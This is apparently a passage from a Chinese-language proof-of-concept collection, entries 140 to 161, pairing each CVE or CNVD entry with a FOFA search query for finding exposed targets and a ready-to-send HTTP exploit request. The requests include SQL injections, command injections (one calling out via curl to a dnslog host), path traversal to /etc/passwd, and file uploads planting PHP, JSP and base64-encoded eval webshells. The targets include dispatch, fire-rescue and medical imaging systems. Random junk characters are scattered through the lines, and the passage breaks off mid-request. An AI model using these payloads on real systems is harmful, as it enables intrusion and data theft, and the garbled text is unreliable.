Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% y! L7 H+ b( j+ Z- ^& r% u7 K' s7 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
d3 \3 Y5 Y" X" R0 z) LAccept-Encoding: gzip, deflate, br
, G; P% k/ m9 q6 t% s! r( v* y3 jConnection: close% v$ H$ }6 a1 }, ^ J3 r/ H
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
1 {; r" N3 Y" v7 c9 tUpgrade-Insecure-Requests: 1
8 }! t0 i- {( _; D% u( q6 b/ T# e1 Q& H9 `, R3 z
! j+ a3 p, R2 A% q- ]9 v
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入7 @- A. n. W1 |% G
CVE-2024-2566. P( Y E3 A N7 F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ Z- c& D! p* a, h* OGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1/ E: d# @/ V9 {, O8 ?/ `, F% e) @
Host: x.x.x.x
+ E1 ]* W% b/ U" J* y: uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 J1 L" M2 P+ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, `% q% f0 n0 O2 r* l7 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* b3 c' X0 |0 q7 q+ j3 [% z CAccept-Encoding: gzip, deflate, br
9 E8 j5 }: r9 V/ w( u2 k: g; kConnection: close& b& \+ I4 n4 i
Cookie: authcode=h8g9
' R9 ]( a3 o* y! C- J1 S8 mUpgrade-Insecure-Requests: 1
4 c+ U8 q8 R* u) ^' c, x8 G( x/ ?% L
. j% {' E( a9 _7 T/ _* ~; }141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入( V8 Z! B6 v1 W( v
FOFA:body="指挥调度管理平台"
% X1 p- a( ^/ _7 s% wPOST /app/ext/ajax_users.php HTTP/1.14 y* A' N8 [6 n& Q
Host: your-ip
" q9 x7 |" `1 {User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
, q5 n; u S& p6 XContent-Type: application/x-www-form-urlencoded
$ S4 U+ r# {6 ~5 S# V/ @* W- {5 r) Z. v( ^( O5 B) J7 l" D
# i @( ? v9 C+ X; ?/ S8 U: {dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -* D4 e. {3 A8 J) |
: k9 M% e3 ~" q/ }- C
' `$ o! ~6 c2 u# K0 Z1 _
142. CMSV6车辆监控平台系统中存在弱密码
# i _; o! x- K D9 z- K6 }" ]1 }CVE-2024-296667 S- R; Y3 C- S' [
FOFA:body="/808gps/"% Q) T( v% ^/ J& `- p
admin/admin
7 H e' D. y& A0 `$ e8 j143. Netis WF2780 v2.1.40144 远程命令执行
4 ]: g0 J8 y0 ^6 k" hCVE-2024-25850; j) y% V+ e6 ~' b" v* a
FOFA:title='AP setup' && header='netis'0 a$ H5 C! W7 |- |' j7 t
PAYLOAD
2 G2 S: V' U& ^+ G7 m! O Y$ Y6 o# w \" G, j( b" F
144. D-Link nas_sharing.cgi 命令注入9 T$ {% `$ p R6 |
FOFA:app="D_Link-DNS-ShareCenter"
& k, q$ l+ Y( S; {& _) ?system参数用于传要执行的命令5 ~ k6 H' a( a
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1) O" Z+ K( e. T \" _
Host: x.x.x.x: \* B) v1 t c$ S- R) ]: S
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.09 c% Z2 M* a0 R: ~4 [4 a: i
Connection: close
B/ h9 ~* f |" zAccept: */*
6 N+ H2 F9 f3 @' j' EAccept-Language: en: v& e; m9 m' Q& }6 G8 W r! E! v5 ?
Accept-Encoding: gzip+ o* e8 y3 W0 l0 \2 f- R
6 } V& l6 H" s# L' K$ H3 u8 e: F/ b& i
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入3 P+ |9 y& C! A9 h( v& c
CVE-2024-34009 |/ c% K9 J5 @$ y r2 t
FOFA:icon_hash="-631559155"/ Q/ |# D3 g2 U; ]) t
GET /global-protect/login.esp HTTP/1.11 e6 [# R; d8 T$ _# D6 J7 q, l
Host: 192.168.30.112:1005) k& e; ~( @3 l/ V8 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
q7 c! h U$ i2 m3 d6 b7 vConnection: close
- L8 s$ I3 E" ?+ U* DCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;6 S9 ^; ]" j- O% `. N+ }2 a
Accept-Encoding: gzip
* i' ]6 y% t; u! I* N4 o" r2 W% S0 W% S
% n! ?. m! D/ j. V. k
146. MajorDoMo thumb.php 未授权远程代码执行0 J1 a& ^- `) v$ Y$ A& m
CNVD-2024-02175
: u# [4 _! N8 {- Z# h) lFOFA:app="MajordomoSL"0 T( V9 e6 Y& }8 Y J- }( R% _9 [
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
' g- |. E; Z" S: d4 u5 @Host: x.x.x.x7 R. L! V/ P+ h0 M S! E: j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( \4 R v+ w: Z0 x2 O% N T
Accept-Charset: utf-8
: M/ z: T* t5 d n- P7 @6 ^% p# ZAccept-Encoding: gzip, deflate5 u5 V0 {& H% o/ @) ~# l) ^9 _
Connection: close) e7 a4 ?: g4 N! P+ H# D
& ^' N2 y0 r, @( z) y* q, ]# }; q. E( x7 e/ ~9 `: M1 X
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
' H& d) C8 h+ i; l, s( y5 GCVE-2024-32399
; I/ s, O, n! r) TFOFA:body="RaidenMAILD"% b! z7 ], I! i+ ]
GET /webeditor/../../../windows/win.ini HTTP/1.1
' W" d* c L+ k. @Host: 127.0.0.1:81" w. O1 v5 |% v" c0 ^
Cache-Control: max-age=0; `: |) M2 S+ C2 @
Connection: close
& ^$ R# h% @9 b: }* R" b8 h9 Y4 E) {; J' v
1 D* M, I) _# B" Q9 `' C
148. CrushFTP 认证绕过模板注入" _! b) l0 G: y; `
CVE-2024-4040: V# P" s) u$ d- V4 d; n' u
FOFA:body="CrushFTP"
+ [; y3 H( c# Z/ h: S T: zPAYLOAD1 T% w/ k4 C! h0 @+ g
) N5 G8 }/ _4 y3 d. e! C3 Q) _
149. AJ-Report开源数据大屏存在远程命令执行 V! Q! `# a) I
FOFA:title="AJ-Report"
- q0 i' v/ s4 `1 i5 G( D- o" |- I( l
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1: }& X$ S! S0 i6 d
Host: x.x.x.x
" E1 N3 o1 u' t. {) k2 i* `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 ?. g! [5 Z J9 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 _6 d" j d6 H2 ~% O! ^
Accept-Encoding: gzip, deflate, br
' }+ h2 T# i" F% W) vAccept-Language: zh-CN,zh;q=0.97 B3 f K* M4 _+ H# ]+ f1 g
Content-Type: application/json;charset=UTF-8
0 N; t0 |5 x0 C0 x& f8 C8 }Connection: close
/ w* {. J; W) ]# }6 P% W
* j- e+ W7 N( Y# U4 E7 h; D- ]4 J{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}! u+ Y a8 I% T2 }4 T, C+ D$ {; I. Y
& i: q( ?6 I5 y/ L' a
150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ W9 b' i7 _1 D3 U4 T5 ?FOFA:title="AJ-Report"
: b) i4 t2 y7 D3 K1 |2 G* g) cPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1$ [0 M: Z; [; N+ H
Host: x.x.x.x# f* t5 B: n0 Y! M4 e% {/ g; @# P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 ^! D( g; O3 @7 z+ W% o& I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ x$ {! |& ^% L5 MAccept-Encoding: gzip, deflate, br
. C! m. v" W" o/ }Accept-Language: zh-CN,zh;q=0.9% [7 L( v- J& W% n2 N7 O6 }5 {
Content-Type: application/json;charset=UTF-8" q, I* R; p% j" `( b/ i8 `, Y1 O: Z
Connection: close
, {" o: Q" R- e: x) Z6 zContent-Length: 339
# p( w# c2 j% k9 [; F5 H
E6 c: Y' k" b, e- C{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}2 k& z3 b4 j: ^/ p! S+ i
% l- C! Y9 W/ R/ _! r4 C `/ U
i' _$ [3 y4 M9 z, n, T' T, y: W# y8 j+ J
151. AJ-Report 1.4.1 pageList sql注入5 E9 _, r* D. {9 t5 D' d; @$ W
FOFA:title="AJ-Report"3 q' v; R+ d5 j6 T* s8 E
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
& P0 U' E6 ~7 g5 e2 iHost: x.x.x.x
1 g% e- q! W" B% B; mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# _) L4 J1 F9 V/ p. t# W
Connection: close' ^1 u$ W V$ @- N; j# s
Accept-Encoding: gzip) {5 J: B! Q8 V' T
! l% h' q' N7 I7 O
; t, h2 \ N. N, }# x" _152. Progress Kemp LoadMaster 远程命令执行6 m; _2 Y- n7 R- o1 a
CVE-2024-1212
% a5 T. _0 v% _2 x) K" vLoadMaster <= 7.2.59.2 (GA). x, o; f7 y5 v* B1 ~) _/ M# Z
LoadMaster<=7.2.54.8 (LTSF)( d. }# X( S9 e$ d% Y
LoadMaster <= 7.2.48.10 (LTS)
& j, g& c+ x7 b4 k, ^, l0 LFOFA:body="LoadMaster"& z7 B" Q( n+ U, @, ~# V2 h% S% V9 Q
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码/ f5 h. j4 s6 n- p
GET /access/set?param=enableapi&value=1 HTTP/1.1
1 `- _0 n1 P. l# J% R3 l% |; KHost: x.x.x.x/ t: J9 m( [" z# B: `3 X0 U2 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
9 O4 x+ o0 q; `/ B$ mConnection: close
1 k) g( I, q+ ~+ ]/ [Accept: */*9 j# a& g3 z/ ~0 _) v0 Z
Accept-Language: en* @" r W' B7 l/ U1 A
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
+ J2 _& S- I, m0 p( aAccept-Encoding: gzip
|7 ]) v$ ^1 j l/ _/ k9 P! i9 U: ~2 S" C2 P& d5 I
# f& d# ~ ^6 Z! \153. gradio任意文件读取% ^! K$ F3 Y4 R* T- s! f
CVE-2024-1561FOFA:body="__gradio_mode__"
3 W$ B2 v+ I) _5 J* l& K第一步,请求/config文件获取componets的id
( r6 N \8 [* [0 A; Vhttp://x.x.x.x/config5 x, V1 N: [6 f3 ~" Z6 |" R
5 C t& [( j# r0 u* `: \# Z) N" R0 B' r) Z6 K$ ]
第二步,将/etc/passwd的内容写入到一个临时文件' Z# y2 Q: |4 V! a/ [' C& R9 k
POST /component_server HTTP/1.1$ ^- q$ Y b0 X! b- r
Host: x.x.x.x
& A$ d& x, X6 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3+ Y6 P- q6 T: x. B
Connection: close
* A: Q5 ~/ ~5 G; t. sContent-Length: 115# w; `1 A9 N) b ?$ E0 J) L1 ?) t* Y
Content-Type: application/json$ }. F% A* e& q Z3 P. A$ n9 T
Accept-Encoding: gzip4 S* a& X6 J. r; A! r5 q* b: g, P
7 r0 H2 H4 d) |4 F" a: d
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
0 W; V/ a- b. L: h: ~9 O: v+ X6 F& U7 W r3 [6 ^
8 {" T8 T1 E. Y0 d S) F- u R第三步访问* m$ b7 z3 M9 B n5 x
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd; n* b# x, [+ g. _) Y4 R4 F: d- R
& O7 ? c; R* x6 o0 F6 b0 O
* D' b' P/ X0 i6 G+ A7 Q) t6 ?, O154. 天维尔消防救援作战调度平台 SQL注入) h& F0 s, y7 P/ v+ K
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"9 Z3 G% T% Q l/ v" J7 ]2 n
POST /twms-service-mfs/mfsNotice/page HTTP/1.1( _ |. a! H$ N w% |
Host: x.x.x.x
1 |4 D0 M* o6 ^$ U* k( e) oContent-Length: 106
2 E* r0 M/ s$ H7 ~Cache-Control: max-age=0
8 x- y4 b& L# f+ L0 B/ G. k5 IUpgrade-Insecure-Requests: 1
8 z8 t3 R( c3 _7 ]7 S, Z& o. iOrigin: http://x.x.x.x
3 e- e1 p9 O" Z; l) q, f4 n- _ xContent-Type: application/json
0 }7 f) _, e8 b8 J3 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36& p% L+ B! U' M, R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' t% ]) C! C5 Z7 l. ^Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page; \# Q, i8 X+ K1 C
Accept-Encoding: gzip, deflate( S, P4 t# v l: }% U
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
( I4 W( `, w( J* R7 fConnection: close& X! P& v0 m& H
% v7 _1 @! P! i
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
$ i: m7 h3 [# [$ ]3 E( r/ Q( N8 ?& v5 Z
0 v( I6 d' f; C( Q* n% H
155. 六零导航页 file.php 任意文件上传
, }: @! B5 h% M* J+ t( Q" x- cCVE-2024-34982
7 ~6 T" n& H: ]% y7 \: x1 R" p4 sFOFA:title=="上网导航 - LyLme Spage"
9 {4 c$ F* }& l9 j$ s G6 ^. BPOST /include/file.php HTTP/1.1
+ t+ k7 \" G) ?. L+ yHost: x.x.x.x
0 M7 ]2 |( O% {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
9 t; g) `, e9 |' H6 C9 Q6 y) BConnection: close! M: z7 [3 G& x2 @- P3 e
Content-Length: 232. z r! r/ a# ^4 \
Accept: application/json, text/javascript, */*; q=0.01# r. h# ]" v" ?7 m
Accept-Encoding: gzip, deflate, br
/ {3 V' N$ j& @8 {5 M6 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# e) L @8 s* \2 g F. tContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f8 H) o5 M8 ~& Y
X-Requested-With: XMLHttpRequest
1 j0 Q0 [ k& ~' _8 L& S+ t: ~& \' U8 L* A- l4 W6 b/ y3 V
-----------------------------qttl7vemrsold314zg0f, u* E( C- ^3 b4 v: k) S6 O
Content-Disposition: form-data; name="file"; filename="test.php"
3 P8 x8 i, l! N1 }4 \% i) WContent-Type: image/png
- k! t6 \* |& k6 u g! N1 x+ n s) y1 p) {& d- {) h
<?php phpinfo();unlink(__FILE__);?>
& g6 v F; i7 Y( G' F9 i- S-----------------------------qttl7vemrsold314zg0f--0 ?( G! H7 B2 ^/ Q) J/ `
% T; O6 e6 I! _7 O/ Q' T1 b- n2 K2 e! ~9 @$ w5 b g
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php+ Z3 G, ~/ |$ M z! R. s ?
9 d" [% {4 {0 K, z* E! V+ Z
156. TBK DVR-4104/DVR-4216 操作系统命令注入3 | E: b- L1 P$ K, j- M" G0 ^4 @
CVE-2024-3721
# a. p! P: k% j1 H$ x$ ^+ W% `- w5 GFOFA:"Location: /login.rsp"0 @$ }/ V* p" E
·TBK DVR-4104
4 q4 z \/ u" t5 [& ^9 Y/ W( u·TBK DVR-4216
1 t7 [* u3 C7 fcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"2 c& c" }1 h) Q9 g$ P! R
- B, H n/ c+ V7 x
8 H v3 Z+ Q) I5 h# U- C' t X
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
7 i) R3 @& F8 F) S( UHost: x.x.x.x/ `9 q9 F1 y2 g! s
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 r e: {- \: I- j# A- \# A5 ^& D* lConnection: close y# _/ q- H/ S7 b1 ?
Content-Length: 0
8 v% {" V5 Q1 l! m: TCookie: uid=1, m( v2 q3 h& R5 Q, K& N+ P0 c
Accept-Encoding: gzip
" ]) [6 C8 L& P# x$ i
0 d4 ], y+ _. v4 }* W* p, T2 I' K% Y( c1 W
157. 美特CRM upload.jsp 任意文件上传
# O! g# J/ b+ k7 C# oCNVD-2023-06971+ F& H- |8 Q! r3 E; _7 R8 m
FOFA:body="/common/scripts/basic.js"
3 O4 n- N0 u' xPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1( k+ x6 w# p' f
Host: x.x.x.x
* ]( N' k3 o7 T" ?' ?% IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.361 g2 {5 q! x) Y1 f2 J: ~6 `% `$ s
Content-Length: 709
" g' N' E0 o0 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 `, t) F5 e. \0 l( b; |' wAccept-Encoding: gzip, deflate
8 U8 }& ?9 O A2 w; gAccept-Language: zh-CN,zh;q=0.9
' f" t: x% y+ b% B5 z" y. VCache-Control: max-age=0$ \/ [ l9 b- F' t$ G5 l
Connection: close
) _; j5 ^( n/ I6 f% ]; F1 R! v. nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
: E- l( ?# }# {/ i' ]Upgrade-Insecure-Requests: 17 A _% H# d5 j3 {# E- V
- j: H& y5 N0 t# l9 ?7 L
------WebKitFormBoundary1imovELzPsfzp5dN
: H) j# K4 O R5 \) J* A- lContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
: y+ Q/ _- f8 v- G/ GContent-Type: application/octet-stream& N" ?4 w" N- p7 |; u
9 b! d/ c& @0 M+ R, `9 Knyhelxrutzwhrsvsrafb
) d; @, \% O9 e$ M' Z3 U------WebKitFormBoundary1imovELzPsfzp5dN# ^8 {5 H8 t" Y6 D
Content-Disposition: form-data; name="key"
- c! z9 j5 l, f7 w( C+ b8 O% f! D7 |0 D. t+ [% s: b) A0 b" [' B
null8 T, {5 c# ^# \. `
------WebKitFormBoundary1imovELzPsfzp5dN
7 z3 {' `: P- {1 mContent-Disposition: form-data; name="form"
8 z' M+ s8 t9 g+ @1 m4 @, D& ~. d7 h, ]2 u9 d, t+ e
null/ p9 ^0 p( n- l& A( n2 ]8 S
------WebKitFormBoundary1imovELzPsfzp5dN* ^+ Z! @ G8 }9 i- C" o
Content-Disposition: form-data; name="field"
6 l# C4 V0 Z" C% N8 ~8 k5 c0 h) K9 Q7 @. _
null6 P$ H5 j/ N& t( x0 ?
------WebKitFormBoundary1imovELzPsfzp5dN) G% q, g E w' i6 B
Content-Disposition: form-data; name="filetitile"
% J6 f4 o* |8 T0 J6 Z; ^, w; T) K8 W5 [& b/ I7 }% G
null7 j+ G2 y" t5 V3 k2 k
------WebKitFormBoundary1imovELzPsfzp5dN
2 }! W" y: d4 ], q/ jContent-Disposition: form-data; name="filefolder"
! L3 @ u6 x, _! ~# ~0 W$ [/ {
; r0 ]' Y+ k( S7 k; g* N5 U. hnull" l/ A {- H8 A* R; S( |! L+ i
------WebKitFormBoundary1imovELzPsfzp5dN--! ^+ H/ K+ x$ n, n, d$ d
! [. y" d: F% S4 W$ F- N
! ]) h! M& q' j( H0 z( uhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp+ `+ m9 Z4 p6 v; v F0 k, Q
1 Z4 m3 X/ W+ o" t) c9 O
158. Mura-CMS-processAsyncObject存在SQL注入2 ^: R/ Y; L7 ^0 ~% a6 ?0 c Z; y, D
CVE-2024-32640
: |, j4 q* p9 H/ gFOFA:"Generator: Masa CMS"4 C. O& r" i# i9 r* ~8 i1 ?; h, a
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1# t7 B; i$ D3 L6 D ~% t. I
Host: {{Hostname}}- }4 n! X9 ]# p0 V3 T
Content-Type: application/x-www-form-urlencoded
' p7 p: a$ T1 Y0 U" l
G0 ]: r3 i& o- D1 ]0 nobject=displayregion&contenthistid=x\'&previewid=1, t! A" i9 L3 p/ ?3 b2 ?" r, c
$ w; x/ ^9 G: ], E) _6 j7 |* i
% n# C! k x+ |( K; r3 y
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
, E$ a' e: ?, H7 b. m) ]FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")+ x; P1 _& n5 T/ N/ l
POST /webservices/WebJobUpload.asmx HTTP/1.1
2 ^) B* Y, z1 Y/ T! j y9 T8 a. EHost: x.x.x.x
: _9 Z6 p" N. ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36- V6 _7 Y5 \; X" \
Content-Length: 1080
1 Q% s- n" o$ W% h2 {Accept-Encoding: gzip, deflate" Q/ X- s! H0 K
Connection: close) b' q# [2 o A+ h* h a. d o
Content-Type: text/xml; charset=utf-8
4 }/ O8 L; B2 v/ d% f' Y$ I) xSoapaction: "http://rainier/jobUpload"
/ Y A. s' Z9 J" _
$ C0 j3 L+ V* M Q: A$ n4 z<?xml version="1.0" encoding="utf-8"?> e- X5 `, T$ E( B( ]
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' ]' D" F. J8 A* `0 j<soap:Body>
, X4 N& I0 A/ X* B' t) R<jobUpload xmlns="http://rainier">
% p Z9 M! s$ I/ j) E4 v" Z" j$ t<vcode>1</vcode>
: H1 n) O9 T8 t* H$ U* q l<subFolder></subFolder>
. @ l& Y: P( |3 Q<fileName>abcrce.asmx</fileName>
4 s6 h/ C6 v N+ A. {3 S) Y<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>4 N! y3 T, P! z
</jobUpload>$ v7 J& r9 r3 F* v; W: d5 h1 g
</soap:Body>8 v: U8 \# ? k4 u& h9 K, M
</soap:Envelope>
7 I1 N8 e g; d. w" Y6 m
% G, [ }8 p: p8 u: T$ [6 d h5 L6 F7 {. A1 P' V$ _' F$ E) ^
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
+ d! b; @* k1 \& b% E7 I' `2 k3 X5 a# x% `$ _$ z- G
3 U, w2 `$ F/ p, E
160. Sonatype Nexus Repository 3目录遍历与文件读取
3 E+ |, ^0 l( KCVE-2024-49563 A/ L) J6 l: K+ [( n* @
FOFA:title="Nexus Repository Manager". l1 j. K# F4 B) r9 Z- O
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1: I: l o6 T( Q, L2 _( }2 @. ?
Host: x.x.x.x+ l. ^: v5 B. \1 G) T
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
5 ~% ] r& g0 [, _' aConnection: close C- o1 G4 ?* w, [( D/ ^5 \4 H+ m
Accept: */*$ _5 i8 F( ^& t5 Y/ F; p
Accept-Language: en
, m2 r @ ^! e' @/ `Accept-Encoding: gzip- z+ g. Z4 Q# r. J- Z, m
; X9 j& c, ^8 Y
0 f1 q. k4 D/ t* D% c* \
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 e) I2 l+ P! e; Y$ F$ W0 e1 U) uFOFA:body="/KT_Css/qd_defaul.css"+ X2 T1 z2 d4 j9 n5 c. S' k
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
! {' Z5 C5 h5 }2 B0 n M: oPOST /Webservice.asmx HTTP/1.1* L4 t- E W5 L9 T0 C
Host: x.x.x.x
7 W6 S, l, c* X- f2 b; BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36* d$ }6 ?2 d# \* e6 q5 z' t
Connection: close. H; U5 g( p. X
Content-Length: 445+ {6 r6 q; v8 b" i5 I% L! A! `
Content-Type: text/xml
" F; ~7 m& X# sAccept-Encoding: gzip
, f) |5 E# ~! t* g5 d' n" g! T. P N
<?xml version="1.0" encoding="utf-8"?>
/ N6 P8 G0 t6 M; p* p- C, j<soap:Envelope xmlns:xsi="
* M$ p) S- U2 fhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"$ C3 B) G& q; B$ m) k0 O$ x* M
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
7 t! A& |8 c( r, z+ |<soap:Body># v9 c% g' b9 \9 `1 s
<UploadResume xmlns="http://tempuri.org/">9 w" s% k# B$ b) v( C
<ip>1</ip>' b& ~* J9 l, x0 c8 n, ]7 E5 V0 u/ |
<fileName>../../../../dizxdell.aspx</fileName>, k, Q+ ~8 o( P" }
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>( j$ E/ L H6 q/ f4 \
<tag>3</tag>! Y# F( Q" U! B5 l
